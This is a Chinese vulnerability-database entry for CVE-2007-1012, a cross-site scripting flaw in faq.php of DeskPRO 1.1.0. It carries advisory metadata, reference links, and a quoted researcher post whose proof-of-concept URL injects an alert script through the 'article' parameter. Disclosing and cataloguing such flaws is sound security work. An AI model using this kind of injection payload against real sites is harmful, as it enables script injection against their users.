DeskPRO 'faq.php' 跨站脚本攻击漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1191643 漏洞类型 跨站脚本
发布时间 2007-02-21 更新时间 2007-02-21
CVE编号 CVE-2007-1012 CNNVD-ID CNNVD-200702-361
漏洞平台 N/A CVSS评分 4.3
|漏洞来源
https://www.securityfocus.com/bid/81907
https://cxsecurity.com/issue/WLB-2007020070
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200702-361
|漏洞详情
DeskPRO1.1.0版本的faq.php中存在跨站脚本攻击漏洞。远程攻击者可以借助条款参数,注入任意web脚本或HTML。
|漏洞EXP
hey guys .. check out this new xss i just found  ;P

Vulnerable :  deskpro.com v1.1.0
web : http://www.deskpro.com, http://customers.qwk.net
Version : v1.1.0

XSS :

http://127.0.0.1/dp/faq.php?article="><script>alert('bl4ck')</script>

################################
Discovered  By BLacK ZeRo
K.S.A
bL4ck (at) bsdmail (dot) org [email concealed]
################################

Best regards ,,
|受影响的产品
DeskPro DeskPro 1.1.0
|参考资料

来源:XF
名称:deskprocom-faq-xss(32525)
链接:http://xforce.iss.net/xforce/xfdb/32525
来源:BUGTRAQ
名称:20070214XSSin[deskpro.comv1.1.0]
链接:http://www.securityfocus.com/archive/1/archive/1/460200/100/0/threaded
来源:SREASON
名称:2267
链接:http://securityreason.com/securityalert/2267
来源:OSVDB
名称:33725
链接:http://osvdb.org/33725